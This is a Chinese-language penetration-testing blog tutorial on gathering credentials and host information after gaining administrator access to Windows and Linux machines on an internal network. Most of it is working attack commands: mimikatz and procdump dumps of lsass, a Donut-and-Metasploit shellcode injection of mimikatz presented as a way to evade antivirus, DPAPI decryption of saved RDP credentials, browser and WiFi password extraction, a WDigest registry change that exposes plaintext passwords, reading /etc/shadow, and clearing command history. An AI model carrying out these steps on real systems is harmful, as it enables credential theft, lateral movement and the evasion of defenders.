内网渗透之内网主机信息收集
目录
Windows信息收集
Windows账号密码
明文抓取
Mimikatz 离线读取Hash和密码明文
MSF加载bin抓取密码(VT查杀率2/59)
LaZagne
RDP登录凭据
mimikatz抓取
NetPass抓取
PowerShell脚本抓取
浏览器账号密码
Google Chrome
QQ浏览器
MSF模块利用
其他软件账号密码
SecureCRT
Xshell
WinSCP
VNC
VPN账号密码
WIFI账号密码
web服务配置路径
IIS
Tomcat
Apache
Nginx
wdcp
其他信息收集
Linux系统信息收集
系统信息
Web应用服务
数据库
关于Linux系统下的自动化信息收集脚本
1.LinPEAS
2.LinEnum
3.Bashark
在我们成功进入了内网渗透的阶段后,拿到了主机的管理员权限,接下来就是要收集内网中主机的各种信息,以便于我们进行后续的横向移动等扩大我们战果的操作。
Windows信息收集
在获取了Windows系统权限(通常是管理员权限)后,我们就需要尽可能多的收集这台机器上的各种信息,各种密码,各种敏感文件和资料了。如下是收集信息的一些命令:
Windows账号密码
在我们拿到了管理员的权限后,首先要做的就是获得Windows主机的登录密码。最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。
使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。
不过一般而言,直接上传mimikatz到主机上抓取密码一般都是不行的,毕竟各大杀毒软件厂商都把mimikatz盯得死死的,而且微软的Windows sever12之后就不再支持抓取明文密码了。所以一般的抓取密码方式肯定是行不通的。
所以我这边就列举一些能躲避杀毒软件的mimikatz的抓取密码的方式。
明文抓取
注意:运行前必须有管理员权限
在这些情况下我们无法获取明文密码
Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码
Windows系统LM Hash及NTLM Hash加密算法,个人系统在windows vista后,服务器系统在windows2003以后,认证方式均为NTLM Hash
此时可以进行注册表修改,这样就可以抓取明文密码了,不过实战环境中来说一般不太可能进行类似的操作。
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f直接将mimikatz 上传到目标服务器,执行相关命令。
mimikatz # privilege::debugPrivilege '20' OK
mimikatz # sekurlsa::logonpasswordsMimikatz 离线读取Hash和密码明文
思路就是通过系统自带的procdump去下载存储用户名密码的文件,然后用mimikatz读取。
Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中.
Procdump是微软官方自带的软件,所以一般不会被系统查杀
Procdump工具导出 lsass.dmp文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp注意:生成的文件的后缀,可能会产生lsass.dump.dmp的文件,注意将后缀删除
然后将lsass.dump文件上传到本地主机,利用mimikatz进行解密。
mimikatz读取 lsass.dmp中Hash和密码
mimikatz.exe "sekurlsa::minidump C:\lsass.dump" "sekurlsa::logonPasswords full" "exit"Procdump下载地址:ProcDump - Sysinternals | Microsoft Learn
注:在virustotal.com上procdump.exe查杀率为0/72,不过这种读取lsass的行为早就被各大杀软拦截了,所以这种静态查杀没有太大参考价值。
说了这么多,总不能都是写漏洞百出的躲避杀软的方法吧,那么就给大家来点干货。
MSF加载bin抓取密码(VT查杀率2/59)
Donut下载:GitHub - TheWover/donut: Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters
shellcode_inject.rb代码下载BypassAntiVirus/tools/mimikatz at master · TideSec/BypassAntiVirus · GitHub
1、首先使用Donut对需要执行的文件进行shellcode生成,这里对mimi进行shellcode生成,生成bin文件,等下会用到。
donut.exe -f mimikatz.exe -a 2 -o mimi.bin #生成mimi.bin文件2、将上面的shellcode_inject.rb放入/opt/metasploit-framework/embedded/framework/modules/post/windows/manage下(实际路径可能不同,也就是metasploit-framework的上级路径,根据实际情况调整),然后进入msf,reload_all同时载入所有模块。(当然这一切都要在MSF获得了一个session会话后进行)。
kali里是在目录/usr/share/metasploit-framework/modules/post/windows/manage/
mac下是在/opt/metasploit-framework/embedded/framework/modules/post/windows/manage
使用之前载入的shellcode_inject注入模块,这里是获取session后的操作了,session先自己上线再进行以下操作。
use post/windows/manage/shellcode_inject
set session 1
set shellcode /tmp/mini.bin
run最后成功加载了mimi,使用shellcode注入执行,有更强的隐蔽性。
注:这里只是写了关于躲避杀软方面的一小部分知识,更多躲避杀软的方式请关注BypassAntiVirus: 远控免杀系列文章及配套工具,汇总测试了互联网上的几十种免杀工具、113种白名单免杀方式、8种代码编译免杀、若干免杀实战技术,并对免杀效果进行了一一测试,为远控的免杀和杀软对抗免杀提供参考。
系列文章。
LaZagne
这里在提一个支持Windows,Linux,mac等环境抓取密码或者其它浏览器等密码的工具。GitHub - AlessandroZ/LaZagne: Credentials recovery project
不过被各大杀毒软件厂商盯得死死的,就请师傅们自己尝试免杀的方法吧
使用方法:
laZagne.exe all #启用所有模块
laZagne.exe browsers #启用browsers模块
laZagne.exe all -w 1.txt #将导出的密码写入1.txt文件
RDP登录凭据
当我们拿到了机器的管理员权限后,想获取其RDP的凭据。那么,该如何操作呢?
mimikatz抓取
首先,执行以下命令查看目标机器是否存在RDP凭据
cmdkey /list #查看mstsc的连接纪录
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* #查找本地的Credentials
存在的话,上传mimikatz,执行以下命令,记录 guidMasterKey 值
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\19DC8328D3873E6AB8EF6B081B771D2E"
执行以下值,找到 guidMasterKey 值 对应的 MasterKey。上面的guidMasterKey在这里是GUID
mimikatz.exe "privilege::debug" "sekurlsa::dpapi"
执行以下命令,使用上面记录的MasterKey破解指定的凭据:19DC8328D3873E6AB8EF6B081B771D2E
mimikatz.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\19DC8328D3873E6AB8EF6B081B771D2E /masterkey:cf8ba397fe285a877997100a3b3fe3259821fe4cb7a47bd9dc8887296a4ff7914a2a3b04a5b8a96d4ce418937604e0a23799f990abb537a599130fce394eb114"
如图,破解出密码明文。
NetPass抓取
工具下载地址:Recover lost Windows 10/7/8/Vista/XP network passwords (Credentials file)
如果直接远程桌面登上去的话,可以使用 netpass.exe 工具直接查看
PowerShell脚本抓取
下载地址:https://github.com/peewpw/Invoke-WCMDump
执行以下代码
Import-Module .\Invoke-WCMDump.ps1
Invoke-WCMDump
也使用CS导入powershell脚本执行,但是会被报毒
注:文中部分内容转载自获取RDP登录凭据_谢公子的博客-CSDN博客
浏览器账号密码
Google Chrome
chrome浏览器默认的用户数据保存目录如下:
用户数据目录:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\
缓存目录:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Cache\
各文件如下:
书签:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
Cookie: C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Cookies
浏览历史:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\History
当前的session:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Current Session
账号密码:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\xx\AppData\Local\Google\Chrome\User Data\Profile\Login Data
QQ浏览器
QQ浏览器默认的用户数据保存目录如下:
用户数据目录:C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default
缓存目录:C:\Users\xx\AppData\Local\Google\Chrome\User Data\Default\Cache\
各文件如下:
书签:C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default\Bookmarks
Cookie: C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default\Cookies
浏览历史:C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default\History
当前的session:C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default\Current Session
账号密码:C:\Users\xx\AppData\Local\Tencent\QQBrowser\User Data\Default\Login Data
360安全浏览器
360浏览器默认的用户数据保存目录如下:
账号密码文件:C:\Users\xx\AppData\Roaming\360se6\User Data\Default\apps\LoginAssis\assis2.db
MSF模块利用
MSF模块中也有抓取浏览器账户密码的模块,当然是在获得了一个seesion会话的前提条件下,执行以下代码。
use post/multi/gather/lastpass_creds
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set session 1
exploit其他软件账号密码
Navicat
“Navicat”是一套可创建多个连接的数据库管理工具,用以方便管理 MySQL、Oracle、PostgreSQL、SQLite、SQL Server、MariaDB 和 MongoDB 等不同类型的数据库,它与阿里云、腾讯云、华为云、Amazon RDS、Amazon Aurora、Amazon Redshift、Microsoft Azure、Oracle Cloud 和 MongoDB Atlas等云数据库兼容。你可以创建、管理和维护数据库。Navicat 的功能足以满足专业开发人员的所有需求,但是对数据库服务器初学者来说又简单易操作。Navicat 的用户界面 (GUI) 设计良好,让你以安全且简单的方法创建、组织、访问和共享信息。
<table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align:top;"><p>MySQL</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\<your connection name></p></td></tr><tr><td style="vertical-align:top;"><p>MariaDB</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\<your connection name></p></td></tr><tr><td style="vertical-align:top;"><p>MongoDB</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB\Servers\<your connection name></p></td></tr><tr><td style="vertical-align:top;"><p>Microsoft SQL</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\<your connection name></p></td></tr><tr><td style="vertical-align:top;"><p>Oracle</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\<your connection name></p></td></tr><tr><td style="vertical-align:top;"><p>PostgreSQL</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\<your connection name></p></td></tr><tr><td style="vertical-align:top;"><p>SQLite</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\<your connection name></p></td></tr></tbody></table>
SecureCRT
SecureCRT 是一款用于连接运行包括Windows、UNIX和VMS的远程系统的理想工具,通过使用内含的VCP命令行程序可以进行加密文件的传输。
<table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align:top;"><p>xp/win2003</p></td><td style="vertical-align:top;"><p>C:\Documents and Settings\USERNAME\Application Data\VanDyke\Config\Sessions</p><p></p></td></tr><tr><td style="vertical-align:top;"><p>win7/win2008以上</p></td><td style="vertical-align:top;"><p>C:\Users\USERNAME\AppData\Roaming\VanDyke\Config\Sessions</p></td></tr></tbody></table>Xshell
Xshell 是一个强大的安全终端模拟软件,它支持SSH1, SSH2, 以及Microsoft Windows 平台的TELNET 协议。Xshell 通过互联网到远程主机的安全连接以及它创新性的设计和特色帮助用户在复杂的网络环境中享受他们的工作。
<table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align:top;"><p>Xshell 5</p></td><td style="vertical-align:top;"><p>%userprofile%\Documents\NetSarang\Xshell\Sessions</p></td></tr><tr><td style="vertical-align:top;"><p>Xshell 6</p></td><td style="vertical-align:top;"><p>%userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions</p></td></tr></tbody></table>
WinSCP
WinSCP是一个Windows环境下使用SSH的开源图形化SFTP客户端。同时支持SCP协议。它的主要功能就是在本地与远程计算机间安全的复制文件。.winscp也可以链接其他系统,比如linux系统。
<table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align:top;"><p>HKCU\Software\Martin Prikryl\WinSCP 2\Sessions</p></td></tr></tbody></table>VNC
VNC (Virtual Network Console)是虚拟网络控制台的缩写。它 是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。VNC 是在基于 UNIX 和 Linux 操作系统的免费的开源软件,远程控制能力强大,高效实用,其性能可以和 Windows 和 MAC 中的任何远程控制软件媲美。 在 Linux 中,VNC 包括以下四个命令:vncserver,vncviewer,vncpasswd,和 vncconnect。大多数情况下用户只需要其中的两个命令:vncserver 和 vncviewer。
<table cellpadding="0" cellspacing="0"><tbody><tr><td style="vertical-align:top;"><p>RealVNC</p></td><td style="vertical-align:top;"><p>HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver</p></td><td style="vertical-align:top;"><p>Password</p></td></tr><tr><td style="vertical-align:top;"><p>TightVNC</p></td><td style="vertical-align:top;"><p>HKEY_CURRENT_USER\Software\TightVNC\Server Value</p></td><td style="vertical-align:top;"><p>Password or PasswordViewOnly</p></td></tr><tr><td style="vertical-align:top;"><p>TigerVNC</p></td><td style="vertical-align:top;"><p>HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4</p></td><td style="vertical-align:top;"><p>Password</p><p></p></td></tr><tr><td style="vertical-align:top;"><p>UltraVNC</p></td><td style="vertical-align:top;"><p>C:\Program Files\UltraVNC\ultravnc.ini</p></td><td style="vertical-align:top;"><p>passwd or passwd2</p></td></tr></tbody></table>
VPN账号密码
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit也可以使用图形化命令工具 Dialupass.exe
WIFI账号密码
#查看帮助
netsh wlan help
#列出无线接口
netsh wlan show interface
#开启无线接口
netsh interface set interface "Interface Name" enabled
#显示连接过的WIFI的配置文件
netsh wlan show profiles
#连接指定wifi
netsh wlan connect name=xxxx
#断开连接
netsh wlan disconnect
#查看连接过的WIFI的配置文件(包含账号密码),需要管理员权限执行
netsh wlan export profile interface=WLAN key=clear folder=C:\
#然后使用type命令查看配置文件
type C:\xxx.xml
#批量显示wifi账号密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
其它常用的命令: 导出配置文件:netsh wlan export profile key=clear 删除配置文件:netsh wlan delete profile name="" 添加配置文件:netsh wlan add profile filename=""一条命令导出电脑中所有WiFi账户密码,不需要管理员权限。
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear #cmd直接执行,不需要管理员权限web服务配置路径
IIS
IIS6:
cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
IIS7、IIS8:
列出网站列表:appcmd.exe %systemroot%/system32/inetsrv/appcmd.exe list site
列出网站物理路径:appcmd.exe %systemroot%\system32\inetsrv\appcmd.exe list vdir
或者使用mimikatz读取IIS7配置文件:
mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exitTomcat
/conf/tomcat-users.xml
/conf/server.xml
/conf/web.xmlApache
/etc/httpd/conf/httpd.confNginx
/etc/nginx/nginx.confwdcp
/www/wdlinux/wdcp/conf/mrpw.conf其他信息收集
系统
systeminfo #查看系统信息
net config workstation #简单查看系统信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #查看系统及版本,英文系统
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" #查看系统及版本,中文系统
echo %PROCESSOR_ARCHITECTURE% #查看系统架构,一般为AMD64
set #查看系统环境变量
wmic qfe get Caption,Description,HotFixID,InstalledOn #查看系统补丁信息
wmic bios #查看bios信息
nbtstat -A ip #netbios查询
fsutil fsinfo drives #查看所有的盘符
gpupdate /force #更新计算机策略
安装的软件版本信息
wmic product get name,version #查看安装的软件及版本
powershell "get-wmiobject -class Win32_product | select-Object -property name,version" #查看安装的软件及版本 1
网络
ipconfig /all #查看ip详细信息
ipconfig /displaydns #查看DNS缓存
route print #查看路由
arp -a #查看arp缓存表
net view #查询机器列表
type C:\Windows\System32\drivers\etc\hosts #查看hosts文件
用户账号密码
whoami /all #查询当前用户权限等
net user #只显示本机的用户,不显示域用户
net user xie #查看用户xie的具体信息
wmic useraccount get /ALL #查看本机用户详细信息
net localgroup #查看组
net localgroup administrators #显示本机的administrators管理员组。除了显示本机中用户,还会显示域用户(前提是该域用户在本机的Administrators组内)
query user 或 quser #查询当前在线用户
qwinsta #查询当前在线用户
qwinsta /SERVER:IP #查看远程登录情况
query session #查询会话
query termserver #查询远程桌面主机列表
net accounts #查看本地密码策略
端口
netstat -ano #查看端口开放情况、
netstat -ano|findstr 80 #查看80端口对应的PID
查看回收站内容
SharpCheckInfo.exe -GetRecycle
服务
net start #查询当前运行的服务
wmic service list brief #查看服务name、进程ID、状态等
进程
tasklist #查看进程列表
tasklist /svc #查看进程,显示进程使用者名称
tasklist | findstr 80 #查看80端口对应的进程
taskkill /f /t /im xx.exe #杀死xx.exe进程
taskkill /F -pid 520 #杀死pid为520的进程
wmic process list brief #查看进程
共享
net use #查看连接
net share #查看共享
wmic share get name,path,status #查看共享信息
net session #查看会话
net view \ip #查询指定IP共享
启动程序信息
wmic startup get command,caption #查看启动项信息
计划任务
schtasks /query /fo LIST /v #查看计划任务
开机时间
net statistics workstation #查看机器开机时间
查询IE浏览器的代理信息
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
查询RDP端口号
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /V portNumber
cmd和powershell的当前窗口历史命令(注,只限于powershellv3以下)
Get-History | Format-List -Property * # 查询 powershell 当前窗口历史操作记录
Clear-History # 删除 powershell 当前窗口历史操作记录
Clear-History -Id 3 # 删除 powershell 当前窗口指定 ID 的历史操作记录
doskey /h # 查看 cmd 的历史操作记录
doskey /reinstall # 删除 cmd 的历史操作记录
# powershell v3、v4 版本需要安装Get-PSReadlineOption
msiexec /q /i PackageManagement_x64.msi
# 查看 powershellv5 历史操作记录
type %appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtLinux系统信息收集
系统信息
hostname 或 uname -n #主机名
history #查看命令历史,有可能可以查看到管理员的一些重要命令,包括密码等
uname -a #所有版本
uname -r #内核版本信息
uname -m #Linux内核架构
cat /proc/version #内核信息
cat /proc/cpuinfo #CPU信息
cat /etc/*-release #发布信息
cat /etc/issue #发布信息
#用户和组信息
whoami #查看当前用户身份
who #查看当前登录系统的所有用户
w #显示已经登陆系统的用户列表,并显示用户正在执行的指令
users #显示当前登录系统的所有用户的用户列表
id #当前用户信息
id || (whoami && groups) 2>/dev/null #当前用户信息
cat /etc/passwd | cut -d: -f1 #查看所有的用户名
cat /etc/passwd | grep "sh$" #查看拥有bash的用户
awk '/\$1|\$6/{print $1}' /etc/shadow #查看可以远程登录的用户
cat /etc/shadow #查看密码
cat /etc/group #查看组信息
last #查看登录历史
more /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)" #查看拥有sudo权限的用户
sudo -l #列出目前用户可执行与无法执行的指令
awk -F: '$3==0{print $1}' /etc/passwd #查看超级用户(uid=0),有些黑客将普通用户的uid改为0,则该普通用户也拥有了超级权限
#登录信息
last #查看最近登录成功的用户及信息,查看的是 /var/log/wtmp 文件
lastb #查看最近登录失败的用户及信息,查看的是 /var/log/btmp 文件
lastlog #显示系统中所有用户最近一次登录信息,读取的是 /var/log/lastlog 文件
cat /var/log/secure* | grep Accepted #查看登录成功的记录
cat /var/log/secure* | grep Failed #查看登录失败的记录
grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}' #查看登录成功的日期、用户名及ip
grep "Failed password for root" /var/log/secure | awk '{print $11}' #查看有哪些ip在爆破主机的root账号
grep "Failed password" /var/log/secure | awk {'print $9'} | sort | uniq -c | sort -nr #查看爆破用户名字典
#网络信息
ifconfig
arp -a
cat /etc/network/interfaces #查看网络接口信息
route #查看路由信息
traceroute baidu.com #查看路由节点
cat /etc/hosts #查看hosts文件
cat /etc/resolv.conf #查看dns信息
cat /etc/services #查看端口服务映射
#服务、端口和进程信息
ps aux / ps -ef #静态查看进程
pstree #查看进程树
top #动态查看进程
ps aux --sort -pcpu #静态查看进程,根据cpu使用情况排行,从高到低
ps aux --sort -pmem #静态查看进程,根据内存使用情况排行,从高到低
netstat -pantu #查看端口信息
netstat -pantu | grep 18176 #查看端口连接情况,过滤含有18176端口的行,就可以查看连接的端口
cat /etc/inetd.conf #由inetd管理的服务列表
cat /etc/xinetd.conf #由xinetd管理的服务列表
cat /etc/exports #nfs服务器的配置
cat /etc/services #查看端口服务映射
ls -l /proc/18176/exe #查看PID为18176的进程的可执行程序
lsof -p 18176 #查看PID为18176的进程打开的文件
lsof -c sshd #查看进程sshd打开的文件
lsof -i:33946 #查看33946端口对应的一些进程
ps -p PID -o lstart #查看进程的启动时间点
fuser -n tcp 33946 #查看33946端口对应的进程PID
#环境信息
env #打印系统环境信息
set #打印系统环境信息
echo $PATH #环境变量中的路径信息
history #历史命令
cat /etc/profile #显示默认系统遍历
cat /etc/shells #显示可用的shell内核,操作系统和设备信息
uname -a 打印所有可用的系统信息
uname -r 内核版本
uname -n 系统主机名。
uname -m 查看系统内核架构(64位/32位)
hostname 系统主机名
lsb_release -a 发行版信息
cat /proc/version 内核信息
cat /etc/*-release 发行版信息
cat /etc/issue 发行版信息
cat /proc/cpuinfo CPU信息用户和群组
cat /etc/passwd 列出系统上的所有用户
cat /etc/shadow 查看用户Hash
cat /etc/group 列出系统上的所有组
groups 当前用户所在的组
groups test test用户所在的组
getent group xxx xxx组里的用户grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 列出所有的超级用户账户
awk -F: 'length($2)==0 {print $1}' /etc/shadow #查看是否存在空口令用户
awk '/\$1|\$6/{print $1}' /etc/shadow #查看远程登录的账号 whoami 查看当前用户
w 谁目前已登录,他们正在做什么
who 命令用于显示系统中有哪些使用者正在上面
last 最后登录用户的列表
lastlog 所有用户上次登录的信息
lastlog –u %username% 有关指定用户上次登录的信息用户和权限信息
whoami 当前用户名
id 当前用户信息
cat /etc/sudoers 可以使用sudo提升到root的用户
sudo -l 查看那些用户当前可以以root身份执行的操作环境信息
env 显示所有的环境变量
set 显示本地环境变量
echo $PATH 环境变量中的路径信息
export [-fnp][变量名称]=[变量设置值] 显示和设置环境变量
pwd 输出工作目录
cat /etc/profile 显示默认系统变量
cat /etc/shells 显示可用的shell
ls -la /etc/*.conf 查看etc下所有配置文件历史命令
history
cat ~/.bash_history # 查看其他用户的历史命令文件
cat /home/user/.bash_historyWeb应用服务
常见配置文件路径:
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/apache/php/php.ini
/bin/php.ini
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/php.ini
/etc/init.d/httpd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/phpmyadmin/config.inc.php
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/home/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/NetServer/bin/stable/apache/php.ini
/opt/www/conf/httpd.conf
/opt/xampp/etc/php.ini
/PHP/php.ini
/php/php.ini
/php4/php.ini
/php5/php.ini
/usr/lib/php.ini
/etc/nginx/nginx.conf
/usr/lib/php/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/usr/local/etc/php.ini
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/php5.ini
/usr/local/share/examples/php/php.ini
/usr/local/share/examples/php4/php.ini
/usr/local/Zend/etc/php.ini
/var/apache2/config.inc
/var/httpd/conf/httpd.conf
/var/httpd/conf/php.ini
/var/httpd/conf/php.ini
/var/local/www/conf/httpd.conf
/var/local/www/conf/php.ini
/var/www/conf/httpd.conf
/web/conf/php.ini
/www/conf/httpd.conf
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf数据库
/etc/init.d/mysql
/etc/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/usr/local/mysql/bin/mysql
/usr/local/mysql/my.cnf
/usr/share/mysql/my.cnf关于Linux系统下的自动化信息收集脚本
说到信息收集,自然是离不开信息收集的脚本了,关于在Linux上执行信息收集的脚本有很多。我这里就列举几个著名的。
1.LinPEAS
GitHub链接:PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub
它是由Carlos P创建的,目的是列举在Linux系统上提升特权的所有可能方法。关于LinPEAS的比较好的一点是它不需要其它依赖项。这使它能够运行现有二进制文件支持的任何内容。
LinPEAS支持Debian,CentOS,FreeBSD和OpenBSD。
LinPEAS不会将任何内容直接写入磁盘,并且在默认情况下运行时,它不会尝试通过su命令以其他用户身份登录。LinPEAS执行花费的时间从2分钟到10分钟不等,具体取决于请求的检查次数。
如果要在CTF比赛中运行LinPEAS,请尽量使用-a参数,它将激活所有检查。LinPEAS监视进程以查找非常频繁的cron任务,但是要执行此操作,您将需要添加-a参数,并且此检查将在文件中写入一些信息,该信息稍后将被删除,这使得我们执行完它不会留下痕迹。
-s(超快和隐身):这将绕过一些耗时的检查,并且不会留下任何痕迹。-P(密码):传递将与sudo -l和Bruteforcing其他用户一起使用的密码-h帮助-o仅执行选定的检查-d <IP/NETMASK>使用fping或ping查找主机ip <端口> -d <IP/NETMASK>使用nc查找正在寻找TCP开放端口的主机它在执行期间导出并取消设置一些环境变量,因此在会话期间执行的任何命令都不会保存在历史记录文件中,如果您不想使用此功能,只需在利用它时添加-n参数即可。
更多方面自己测试,这里就不多说了。
2.LinEnum
GitHub链接:GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
它是由Rebootuser创建的。LinEnum是一个Shell脚本,其工作原理是从目标计算机中提取有关提升特权的信息。它支持实验报告功能,可以帮助以可读的报告格式导出扫描结果。一些参数,例如:
-k 输入关键字-e 输入导出位置-t 包括详尽的测试-s 提供当前用户密码以检查sudo权限(不安全)-r 输入报告名称-h 显示帮助文本
渗透过程中只要将脚本文件上传到目标主机上运行即可。
执行以下代码运行。
./LinEnum.sh
3.Bashark
GitHub链接:https://github.com/redcode-labs/Bashark
它是由RedCode Labs创建的。Bashark旨在帮助渗透测试人员和安全研究人员在Linux,OSX或Solaris Server的安全评估的后开发阶段。
Bashark比较好的一点是它一个bash脚本,这意味着它可以直接从终端运行而无需任何安装。它速度快,不会使目标计算机过载。它也不需要任何特定依赖项,由于它在执行后抹去了它的存在,因此执行后很难被检测到。在这里,我们使用wget命令下载了Bashark,该命令在攻击者计算机上本地托管。然后使用chmod提供执行权限,然后运行Bashark脚本。它将升级您的Shell,使其能够执行不同的命令。
渗透过程中只要将脚本文件上传到目标主机上运行即可。
执行以下代码运行。
./bashark.sh在这里,我们使用getperm -c命令查找。Bashark还使用getconf命令枚举了所有常见的配置文件路径。
除了以上一些功能,输入help命令,可以根据个人需求进一步利用。
内网渗透之内网主机信息收集相关推荐
- 2022-10-15(Linux应急响应、配置漏洞之DNS域传送、内网渗透之内网主机发现技巧)
http://noahblog.360.cn/advanced-windows-taskscheduler-playbook/@[toc] [重要]拜读的文章链接都在标题上. 一.linux应急响应 ...
- 内网渗透之内网信息收集(综合)
前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...
- 渗透测试-C段主机信息收集
提示:提示:注意:网络安全环境需要大家共同维护,请大家共同遵守网络安全规章制度,仅供大家参考,造成的法律后果,不由本人承担 文章目录 一.C段 二.C段信息收集 1. Nmap扫描获取C段信息 2. ...
- DaZeng:3分钟搞定内网渗透之外网访问指定域名
内网渗透之外网访问指定域名 作用:在本地配置好之后,启动http-server服务,所有人可外网都可访问指定域名即可. 具体配置 使用钉钉内网穿透 在自己电脑上指定目录下 clone git仓库执行命 ...
- 主机信息收集工具DMitry
主机信息收集工具DMitry DMitry是Kali Linux内置的一款信息收集工具.它的目标主要是Web类主机.它不仅通过主动查询.端口扫描方式,还借助第三方网站和搜索引擎获取信息. 它搜集的信息 ...
- 主机信息收集技术 -Nmap
内容: 基础知识 Nmap Zenmap 主机信息收集技术-基础知识 黑客攻击的一般过程 信息收集 • 主要收集目标主机的相关信息,主要包括端口.服务.漏洞等信息.信息收集手段多样,可借助工具也多种多 ...
- 渗透测试技术----被动信息收集(一)--nslookup、dig、DNS字典爆破、whois
一.渗透测试流程 1.信息收集(包括被动搜集和主动搜集) 2.漏洞扫描 3.漏洞利用 4.提权 5.植入后门,清理痕迹 6.生成渗透测试报告 很多人在信息收集阶段大概会占用30%到50%的时间,由此可 ...
- 菜鸟渗透日记30---python渗透测试编程之信息收集2-端口扫描
